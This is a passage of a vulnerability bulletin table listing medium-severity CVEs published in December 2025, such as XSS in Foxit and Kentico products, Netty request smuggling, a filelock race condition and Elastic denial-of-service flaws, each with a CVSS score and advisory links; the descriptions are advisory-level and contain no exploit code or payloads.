| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Asset List functionality due to improper validation of network traffic data. An unauthenticated attacker can send specially crafted network packets to inject HTML tags into asset attributes. When a victim views the affected assets in the Asset List (and similar functions), the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2025-12-18 | 6.1 | CVE-2025-40893 | https://security.nozominetworks.com/NN-2025:14-01 |
| Advantech--WebAccess/SCADA | Advantech WebAccess/SCADA is vulnerable to SQL injection, which may allow an attacker to execute arbitrary SQL commands. | 2025-12-18 | 6.3 | CVE-2025-46268 | https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json |
| Qualcomm, Inc.--Snapdragon | Information disclosure while exposing internal TA-to-TA communication APIs to HLOS | 2025-12-18 | 6.7 | CVE-2025-47319 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Information disclosure while processing system calls with invalid parameters. | 2025-12-18 | 6.5 | CVE-2025-47325 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.21, an unauthenticated user can store an XSS payload through the inventory endpoint. Users should upgrade to 10.0.21 to receive a patch. | 2025-12-16 | 6.5 | CVE-2025-59935 | https://github.com/glpi-project/glpi/security/advisories/GHSA-j8vv-9f8m-r7jx |
| BullWall--Server Intrusion Protection | BullWall Server Intrusion Protection has a noticeable delay before the MFA check when connecting via RDP. A remote authenticated attacker with administrative privileges can potentially bypass detection during this window. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 6.2 | CVE-2025-62003 | url url |
| BullWall--Server Intrusion Protection | BullWall Server Intrusion Protection services are initialized after login services. An authenticated attacker with administrative permissions can log in after boot and bypass MFA. SIP service does not retroactively enforce the challenge or disconnect unauthenticated sessions. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 6.2 | CVE-2025-62004 | url url |
| Tormorten--WP Microdata | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tormorten WP Microdata allows Stored XSS. This issue affects WP Microdata: from n/a through 1.0. | 2025-12-21 | 6.5 | CVE-2025-62901 | https://vdp.patchstack.com/database/wordpress/plugin/wp-microdata/vulnerability/wordpress-wp-microdata-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| HappyDevs--TempTool | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HappyDevs TempTool allows Stored XSS. This issue affects TempTool: from n/a through 1.3.1. | 2025-12-21 | 6.5 | CVE-2025-62926 | https://vdp.patchstack.com/database/wordpress/plugin/current-template-name/vulnerability/wordpress-temptool-show-current-template-info-plugin-1-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AmentoTech--Tuturn | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AmentoTech Tuturn allows Path Traversal. This issue affects Tuturn: from n/a before 3.6. | 2025-12-18 | 6.5 | CVE-2025-64235 | https://vdp.patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-arbitrary-file-download-vulnerability?_s_id=cve |
| Crocoblock--JetElements For Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetElements For Elementor allows DOM-Based XSS. This issue affects JetElements For Elementor: from n/a through 2.7.12. | 2025-12-18 | 6.5 | CVE-2025-64355 | https://vdp.patchstack.com/database/wordpress/plugin/jet-elements/vulnerability/wordpress-jetelements-for-elementor-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Starting in version 9.1.0 and prior to version 10.0.21, an unauthorized user with an API access can read all knowledge base entries. Users should upgrade to 10.0.21 to receive a patch. | 2025-12-16 | 6.5 | CVE-2025-64520 | https://github.com/glpi-project/glpi/security/advisories/GHSA-62p9-prpq-j62q https://github.com/glpi-project/glpi/commit/a3d5cc4a63ae592c0b5592ebe6d562164904dab3 |
| pluginsGLPI--databaseinventory | pluginsGLPI's Database Inventory Plugin "manages" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. Prior to version 1.1.2, in certain conditions (database write access must first be obtained through another vulnerability or misconfiguration), user-controlled data is stored insecurely in the database via computergroup, and is later unserialized on every page load, allowing arbitrary PHP object instantiation. Version 1.1.2 fixes the issue. | 2025-12-19 | 6.4 | CVE-2025-65035 | https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-xc3r-32rx-3j4j https://github.com/pluginsGLPI/databaseinventory/commit/08c7055d2c5fc744cb092d7d56a608e359c56f1a https://github.com/pluginsGLPI/databaseinventory/blob/1.1.2/CHANGELOG.md#112---2025-11-25 |
| PickPlugins--Post Grid and Gutenberg Blocks | Missing Authorization vulnerability in PickPlugins Post Grid and Gutenberg Blocks allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post Grid and Gutenberg Blocks: from n/a through 2.3.17. | 2025-12-18 | 6.5 | CVE-2025-66058 | https://vdp.patchstack.com/database/wordpress/plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-17-broken-access-control-vulnerability-2?_s_id=cve |
| Hikvision--DS-7104HGHI-F1 | There is a privilege escalation vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and gaining access to an unrestricted shell environment. | 2025-12-19 | 6.2 | CVE-2025-66173 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/ |
| Hikvision--DS-7104HGHI-F1 | There is an improper authentication vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and running a series of commands. | 2025-12-19 | 6.5 | CVE-2025-66174 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/ |
| Foxit Software Inc.--webplugins.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in webplugins.foxit.com. A postMessage handler fails to validate the message origin and directly assigns externalPath to a script source, allowing an attacker to execute arbitrary JavaScript when a crafted postMessage is received. | 2025-12-19 | 6.3 | CVE-2025-66500 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Predefined Text feature of the Foxit eSign section. A crafted payload can be stored via the Identity "First Name" field, which is later rendered into the DOM without proper sanitization. As a result, the injected script may execute when predefined text is used or when viewing document properties. | 2025-12-19 | 6.3 | CVE-2025-66501 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Page Templates feature. A crafted payload can be stored as the template name, which is later rendered into the DOM without proper sanitization. As a result, the injected script executes each time the affected PDF is loaded. | 2025-12-19 | 6.3 | CVE-2025-66502 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Layer Import functionality. A crafted payload can be injected into the "Create new Layer" field during layer import and is later rendered into the DOM without proper sanitization. As a result, the injected script executes when the Layers panel is accessed. | 2025-12-19 | 6.3 | CVE-2025-66519 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in the Portfolio feature of the Foxit PDF Editor cloud (pdfonline.foxit.com). User-supplied SVG files are not properly sanitized or validated before being inserted into the HTML structure. As a result, embedded HTML or JavaScript within a crafted SVG may execute whenever the Portfolio file list is rendered. | 2025-12-19 | 6.3 | CVE-2025-66520 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in pdfonline.foxit.com within the Trusted Certificates feature. A crafted payload can be injected as the certificate name, which is later rendered into the DOM without proper sanitization. As a result, the injected script executes each time the Trusted Certificates view is loaded. | 2025-12-19 | 6.3 | CVE-2025-66521 | https://www.foxit.com/support/security-bulletins.html |
| Foxit Software Inc.--pdfonline.foxit.com | A stored cross-site scripting (XSS) vulnerability exists in the Digital IDs functionality of the Foxit PDF Editor Cloud (pdfonline.foxit.com). The application does not properly sanitize or encode the Common Name field of Digital IDs before inserting user-supplied content into the DOM. As a result, embedded HTML or JavaScript may execute whenever the Digital IDs dialog is accessed or when the affected PDF is loaded. | 2025-12-19 | 6.3 | CVE-2025-66522 | https://www.foxit.com/support/security-bulletins.html |
| netty--netty | Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.129.Final and 4.2.8.Final, the `io.netty.handler.codec.http.HttpRequestEncoder` has a CRLF injection with the request URI when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the URI. Any application / framework using `HttpRequestEncoder` can be subject to be abused to perform request smuggling using CRLF injection. Versions 4.1.129.Final and 4.2.8.Final fix the issue. | 2025-12-16 | 6.5 | CVE-2025-67735 | https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4 |
| Mintlify--Mintlify Platform | The Static Asset API in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via the subdomain parameter because any tenant's assets can be served on any other tenant's documentation site. | 2025-12-19 | 6.4 | CVE-2025-67842 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28 https://news.ycombinator.com/item?id=46317098 https://heartbreak.ing |
| Mintlify--Mintlify Platform | A Directory Traversal vulnerability in the Static Asset Proxy Endpoint in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via a crafted URL containing path traversal sequences. | 2025-12-19 | 6.4 | CVE-2025-67845 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 https://heartbreak.ing/ |
| altcha-org--altcha-lib | ALTCHA is privacy-first software for captcha and bot protection. A cryptographic semantic binding flaw in ALTCHA libraries allows challenge payload splicing, which may enable replay attacks. The HMAC signature does not unambiguously bind challenge parameters to the nonce, allowing an attacker to reinterpret a valid proof-of-work submission with a modified expiration value. This may allow previously solved challenges to be reused beyond their intended lifetime, depending on server-side replay handling and deployment assumptions. The vulnerability primarily impacts abuse-prevention mechanisms such as rate limiting and bot mitigation. It does not directly affect data confidentiality or integrity. This issue has been addressed by enforcing explicit semantic separation between challenge parameters and the nonce during HMAC computation. Users are advised to upgrade to patched versions, which include version 1.0.0 of the altcha Golang package, version 1.0.0 of the altcha Rubygem, version 1.0.0 of the altcha pip package, version 1.0.0 of the altcha Erlang package, version 1.4.1 of the altcha-lib npm package, version 1.3.1 of the altcha-org/altcha Composer package, and version 1.3.0 of the org.altcha:altcha Maven package. As a mitigation, implementations may append a delimiter to the end of the `salt` value prior to HMAC computation (for example, `<salt>?expires=<time>&`). This prevents ambiguity between parameters and the nonce and is backward-compatible with existing implementations, as the delimiter is treated as a standard URL parameter separator. | 2025-12-16 | 6.5 | CVE-2025-68113 | https://github.com/altcha-org/altcha-lib/security/advisories/GHSA-6gvq-jcmp-8959 https://github.com/altcha-org/altcha-lib-ex/commit/09b2bad466ad0338a5b24245380950ea9918333e https://github.com/altcha-org/altcha-lib-go/commit/4a5610745ef79895a67bac858b2e4f291c2614b8 https://github.com/altcha-org/altcha-lib-java/commit/69277651fdd6418ae10bf3a088901506f9c62114 https://github.com/altcha-org/altcha-lib-php/commit/9e9e70c864a9db960d071c77c778be0c9ff1a4d0 https://github.com/altcha-org/altcha-lib-rb/commit/4fd7b64cbbfc713f3ca4e066c2dd466e3b8d359b https://github.com/altcha-org/altcha-lib/commit/cb95d83a8d08e273b6be15e48988e7eaf60d5c08 https://github.com/altcha-org/altcha-lib-java/releases/tag/v1.3.0 https://github.com/altcha-org/altcha-lib-php/releases/tag/v1.3.1 https://github.com/altcha-org/altcha-lib/releases/tag/1.4.1 |
| auth0--auth0-PHP | Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens. Projects are affected if they use Auth0-PHP SDK versions between v8.0.0 and v8.17.0, or applications using the following SDKs that rely on the Auth0-PHP SDK versions between v8.0.0 and v8.17.0: Auth0/symfony versions between 5.0.0 and 5.5.0, Auth0/laravel-auth0 versions between 7.0.0 and 7.19.0, and/or Auth0/wordpress plugin versions between 5.0.0-BETA0 and 5.4.0. Auth0/Auth0-PHP version 8.18.0 contains a patch for the issue. | 2025-12-17 | 6.8 | CVE-2025-68129 | https://github.com/auth0/auth0-PHP/security/advisories/GHSA-j2vm-wrq3-f7gf https://github.com/auth0/laravel-auth0/security/advisories/GHSA-7hh9-gp72-wh7h https://github.com/auth0/symfony/security/advisories/GHSA-f3r2-88mq-9v4g https://github.com/auth0/wordpress/security/advisories/GHSA-vvg7-8rmq-92g7 https://github.com/auth0/auth0-PHP/commit/7fe700053aee609718460c123f00f53c511f0f7f https://github.com/auth0/laravel-auth0/commit/a1c3344dc0e5a36e8f56c8cfc535728d3d7558f3 https://github.com/auth0/symfony/commit/0103d6f8dcef6996653fad1f823d1c167f472479 https://github.com/auth0/wordpress/commit/b207c6f7fd06507b90c4e6bcc18a857ef9e018de https://github.com/auth0/auth0-PHP/releases/tag/8.18.0 https://github.com/auth0/laravel-auth0/releases/tag/7.20.0 https://github.com/auth0/symfony/releases/tag/5.6.0 https://github.com/auth0/wordpress/releases/tag/5.5.0 |
| tox-dev--filelock | filelock is a platform-independent file lock for Python. In versions prior to 3.20.1, a Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. All users of filelock on Unix, Linux, macOS, and Windows systems are impacted. The vulnerability cascades to dependent libraries. The attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. The issue is fixed in version 3.20.1. If immediate upgrade is not possible, use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases); ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks; and/or monitor lock file directories for suspicious symlinks before running trusted applications. These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. | 2025-12-16 | 6.3 | CVE-2025-68146 | https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f https://github.com/tox-dev/filelock/pull/461 https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e https://github.com/tox-dev/filelock/releases/tag/3.20.1 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.1 excessive privileges were possible due to storing GitHub personal access token instead of an installation token | 2025-12-16 | 6.5 | CVE-2025-68267 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| Elastic--Packetbeat | Improper Bounds Check (CWE-787) in Packetbeat can allow a remote unauthenticated attacker to exploit a Buffer Overflow (CAPEC-100) and reliably crash the application or cause significant resource exhaustion via a single crafted UDP packet with an invalid fragment sequence number. | 2025-12-18 | 6.5 | CVE-2025-68381 | https://discuss.elastic.co/t/packetbeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-30/384178 |
| Elastic--Packetbeat | Out-of-bounds read (CWE-125) allows an unauthenticated remote attacker to perform a buffer overflow (CAPEC-100) via the NFS protocol dissector, leading to a denial-of-service (DoS) through a reliable process crash when handling truncated XDR-encoded RPC messages. | 2025-12-18 | 6.5 | CVE-2025-68382 | https://discuss.elastic.co/t/packetbeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-31/384179 |
| Elastic--Filebeat | Improper Validation of Specified Index, Position, or Offset in Input (CWE-1285) in Filebeat Syslog parser and the Libbeat Dissect processor can allow a user to trigger a Buffer Overflow (CAPEC-100) and cause a denial of service (panic/crash) of the Filebeat process via either a malformed Syslog message or a malicious tokenizer pattern in the Dissect configuration. | 2025-12-18 | 6.5 | CVE-2025-68383 | https://discuss.elastic.co/t/filebeat-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-32/384180 |
| Elastic--Elasticsearch | Allocation of Resources Without Limits or Throttling (CWE-770) in Elasticsearch can allow a low-privileged authenticated user to cause Excessive Allocation (CAPEC-130) causing a persistent denial of service (OOM crash) via submission of oversized user settings data. | 2025-12-18 | 6.5 | CVE-2025-68384 | https://discuss.elastic.co/t/elasticsearch-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-33/384181 |
| Elastic--Kibana | Improper neutralization of input during web page generation ('Cross-site Scripting') (CWE-79) allows an unauthenticated user to embed a malicious script in content that will be served to web browsers, causing cross-site scripting (XSS) (CAPEC-63) via a vulnerability in a function handler in the Vega AST evaluator. | 2025-12-18 | 6.1 | CVE-2025-68387 | https://discuss.elastic.co/t/kibana-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-35/384183 |
| Elastic--Kibana | Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana can allow a low-privileged authenticated user to cause Excessive Allocation (CAPEC-130) of computing resources and a denial of service (DoS) of the Kibana process via a crafted HTTP request. | 2025-12-18 | 6.5 | CVE-2025-68389 | https://discuss.elastic.co/t/kibana-8-19-9-9-1-9-and-9-2-3-security-update-esa-2025-36/384184 |
| Arista Networks--EOS | On affected platforms running Arista EOS with OSPFv3 configured, a specially crafted packet can cause the OSPFv3 process to have high CPU utilization, which may result in the OSPFv3 process being restarted. This may cause disruption of the OSPFv3 routes on the switch. This issue was discovered internally by Arista, which is not aware of any malicious uses of this issue in customer networks. | 2025-12-16 | 6.5 | CVE-2025-8872 | https://www.arista.com/en/support/advisories-notices/security-advisory/23115-security-advisory-0128 |
| Zohocorp--ManageEngine Applications Manager | Zohocorp ManageEngine Applications Manager versions 177400 and below are vulnerable to Stored Cross-Site Scripting vulnerability in the NOC view. | 2025-12-18 | 6.1 | CVE-2025-9787 | https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-9787.html |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows attackers to leak virtual context URLs via the HTTP Referer header when users interact with third-party domains. Sensitive virtual context information can be exposed to external domains through page builder interactions and link/image loading. | 2025-12-18 | 5.3 | CVE-2019-25228 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.47 Virtual Context Information Disclosure |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via administration input fields in the Rich text editor component. Attackers can exploit this vulnerability to execute arbitrary scripts in users' browsers. | 2025-12-18 | 5.4 | CVE-2022-50681 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.88 Rich Text Editor Reflected XSS |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows attackers to view sensitive stack trace details via Portal Engine form control error messages. Detailed error messages can expose internal system information and potentially reveal implementation details to unauthorized users. | 2025-12-18 | 5.3 | CVE-2022-50686 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0 Portal Engine Form Control Information Disclosure |
| HappyFiles--HappyFiles Pro | Missing Authorization vulnerability in HappyFiles HappyFiles Pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HappyFiles Pro: from n/a through 1.8.1. | 2025-12-21 | 5.4 | CVE-2023-25445 | https://vdp.patchstack.com/database/wordpress/plugin/happyfiles-pro/vulnerability/wordpress-happyfiles-pro-plugin-1-8-1-broken-access-control-vulnerability?_s_id=cve |
| Unknown--WBCE CMS | WBCE CMS 1.6.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious HTML and CSS to capture user keystrokes. Attackers can upload a crafted HTML file with CSS-based keylogging techniques to intercept password characters through background image requests. | 2025-12-16 | 5.4 | CVE-2023-53901 | ExploitDB-51566 WBCE CMS Product Webpage VulnCheck Advisory: WBCE CMS 1.6.1 Cross-Site Scripting and Open Redirect Vulnerability |
| websitebaker--WebsiteBaker | WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files with script tags that execute when the file is viewed, enabling persistent cross-site scripting attacks. | 2025-12-16 | 5.4 | CVE-2023-53903 | ExploitDB-51553 WebsiteBaker Product Webpage VulnCheck Advisory: WebsiteBaker 2.13.3 Stored Cross-Site Scripting via SVG File Upload |
| wbce-cms--WBCE CMS | WBCE CMS 1.6.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by uploading crafted SVG files through the media manager. Attackers can upload SVG files containing script tags to the /wbce/modules/elfinder/ef/php/connector.wbce.php endpoint and execute JavaScript when victims access the uploaded file. | 2025-12-17 | 5.4 | CVE-2023-53909 | ExploitDB-51484 Official Product Webpage VulnCheck Advisory: WBCE CMS 1.6.1 SVG File Content Cross-Site Scripting |
| wbce-cms--WBCE CMS | WBCE CMS 1.6.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by inserting script tags into page content through the WYSIWYG editor. Attackers can submit POST requests to /wbce/modules/wysiwyg/save.php with malicious script content in the content parameter to execute JavaScript when users view the affected page. | 2025-12-17 | 5.4 | CVE-2023-53910 | ExploitDB-51484 Official Product Webpage VulnCheck Advisory: WBCE CMS 1.6.1 Stored Cross-Site Scripting via Page Content |
| Zenphoto--Zenphoto | Zenphoto 1.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by inserting HTML content into album descriptions. Attackers can create albums with malicious iframe or script tags in the description field that execute when users view the album page. | 2025-12-17 | 5.4 | CVE-2023-53915 | ExploitDB-51485 Official Product Webpage VulnCheck Advisory: Zenphoto 1.6 Stored Cross-Site Scripting via Album Description |
| Zenphoto--Zenphoto | Zenphoto 1.6 contains a stored cross-site scripting vulnerability in the user postal code field accessible through the admin-users.php interface. When administrators view user information imported as HTML, malicious JavaScript payloads injected into the postal code field execute in their browser context. | 2025-12-17 | 5.4 | CVE-2023-53916 | ExploitDB-51485 Official Product Webpage VulnCheck Advisory: Zenphoto 1.6 Stored Cross-Site Scripting via User Postal Code Field |
| Podcastgenerator--PodcastGenerator | PodcastGenerator 3.2.9 contains a stored cross-site scripting vulnerability in the episode title field accessible through the episodes upload interface (episodes_upload.php). Malicious JavaScript payloads injected into episode titles execute when administrators view the episodes list page (episodes_list.php). | 2025-12-17 | 5.4 | CVE-2023-53918 | ExploitDB-51454 Official Product Webpage VulnCheck Advisory: PodcastGenerator Stored Cross-Site Scripting via Episode Title Field |
| Ulicms--Ulicms | UliCMS 2023.1 contains a stored cross-site scripting vulnerability that allows attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload crafted SVG files through the file management interface that execute arbitrary scripts when viewed by other users. | 2025-12-17 | 5.4 | CVE-2023-53925 | ExploitDB-51435 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1 Stored Cross-Site Scripting via SVG File Upload |
| Php-fusion--PHPFusion | PHPFusion 9.10.30 contains a stored cross-site scripting vulnerability in the file manager that allows attackers to upload malicious SVG files with embedded JavaScript. Attackers can upload SVG files with script tags that execute arbitrary JavaScript when viewed, potentially stealing user session information or performing client-side attacks. | 2025-12-17 | 5.4 | CVE-2023-53928 | ExploitDB-51411 Official Product Homepage VulnCheck Advisory: PHPFusion 9.10.30 Stored Cross-Site Scripting via File Manager Upload |
| Revive-adserver--revive-adserver | Revive Adserver 5.4.1 contains a cross-site scripting vulnerability in the banner advanced configuration page that allows attackers to inject malicious scripts. Attackers can craft a malicious link to the banner-advanced.php endpoint with XSS payloads in prepend and append parameters to execute arbitrary JavaScript when an admin views the page. | 2025-12-17 | 5.4 | CVE-2023-53931 | ExploitDB-51401 Official Product Homepage VulnCheck Advisory: Revive Adserver 5.4.1 Cross-Site Scripting via Banner Advanced Settings |
| Codester--WBiz Desk | WBiz Desk 1.2 contains a SQL injection vulnerability that allows non-admin users to manipulate database queries through the 'tk' parameter in ticket.php. Attackers can inject crafted SQL statements using UNION-based techniques to extract sensitive database information by sending malformed requests to the ticket endpoint. | 2025-12-18 | 5.4 | CVE-2023-53935 | ExploitDB-51451 Official Product Homepage VulnCheck Advisory: WBiz Desk 1.2 SQL Injection Vulnerability via ticket.php Parameter |
| tuzitio--Cameleon CMS | Cameleon CMS 2.7.4 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts into post titles. Attackers can create posts with embedded SVG scripts that execute when other users mouse over the post title, potentially stealing session cookies and executing arbitrary JavaScript. | 2025-12-18 | 5.4 | CVE-2023-53936 | ExploitDB-51446 Product GitHub Repository VulnCheck Advisory: Cameleon CMS 2.7.4 Authenticated Persistent Cross-Site Scripting via Post Creation |
| iwind--RockMongo | RockMongo 1.1.7 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through multiple unencoded input parameters. Attackers can exploit the vulnerability by submitting crafted payloads in the database, collection, and login parameters to execute arbitrary JavaScript in the victim's browser. | 2025-12-18 | 5.4 | CVE-2023-53938 | ExploitDB-51437 Official Product Homepage VulnCheck Advisory: RockMongo 1.1.7 Stored Cross-Site Scripting Vulnerability via Multiple Parameters |
| TinyWebGallery--TinyWebGallery | TinyWebGallery v2.5 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the folder name parameter. Attackers can edit album folder names with script tags to execute arbitrary JavaScript when other users view the affected gallery pages. | 2025-12-18 | 5.4 | CVE-2023-53939 | ExploitDB-51442 Official Product Homepage VulnCheck Advisory: TinyWebGallery v2.5 Stored Cross-Site Scripting via Folder Name Parameter |
| Glpi-Project--GLPI | GLPI 9.5.7 contains a username enumeration vulnerability in the lost password recovery mechanism that allows attackers to validate email addresses. Attackers can systematically test email addresses by submitting requests to the password reset endpoint and analyzing response differences to identify valid user accounts. | 2025-12-18 | 5.3 | CVE-2023-53943 | ExploitDB-51418 Official Product Homepage VulnCheck Advisory: GLPI 9.5.7 Username Enumeration Vulnerability via Lost Password Endpoint |
| Kentico--Xperience | A cookie security configuration vulnerability in Kentico Xperience allows attackers to bypass SSL requirements when setting administration cookies via web.config. The vulnerability affects .NET Framework projects by incorrectly handling the 'requireSSL' attribute, potentially compromising session security and authentication state. | 2025-12-18 | 5.3 | CVE-2024-58317 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.164 Cookie Security Configuration |
| Kentico--Xperience | A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the rich text editor component for page and form builders. Attackers can exploit this vulnerability by entering malicious URIs, potentially allowing malicious scripts to execute in users' browsers. | 2025-12-18 | 5.4 | CVE-2024-58318 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.162 Rich Text Editor Stored XSS |
| Kentico--Xperience | A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in administrative users' browsers. | 2025-12-18 | 5.4 | CVE-2024-58319 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.160 Pages Dashboard Widget Reflected XSS |
| Kentico--Xperience | An information disclosure vulnerability in Kentico Xperience allows public users to access sensitive administration interface hostname details during authentication. Attackers can retrieve confidential hostname configuration information through a public endpoint, potentially exposing internal network details. | 2025-12-18 | 5.3 | CVE-2024-58320 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.159 Authentication Information Disclosure |
| Mitsubishi Electric Corporation--GT Designer3 Version1 (GOT2000) | Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GT Designer3 Version1 (GOT2000) all versions and Mitsubishi Electric GT Designer3 Version1 (GOT1000) all versions allows a local unauthenticated attacker to obtain plaintext credentials from the project file for GT Designer3. This could allow the attacker to illegally operate the GOT2000 series or GOT1000 series by using the obtained credentials. | 2025-12-17 | 5.1 | CVE-2025-11009 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-017_en.pdf https://jvn.jp/vu/JVNVU99629801/ |
| jetmonsters--JetFormBuilder Dynamic Blocks Form Builder | The JetFormBuilder - Dynamic Blocks Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the run_callback function in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to generate forms using AI, consuming the site's AI usage limits. | 2025-12-16 | 5.3 | CVE-2025-11991 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c08444ef-77bc-4e9d-8d94-04b90cc99ded?source=cve https://plugins.trac.wordpress.org/browser/jetformbuilder/tags/3.5.2.1/modules/ai/rest-api/endpoints/generate-form-endpoint.php#L26 |
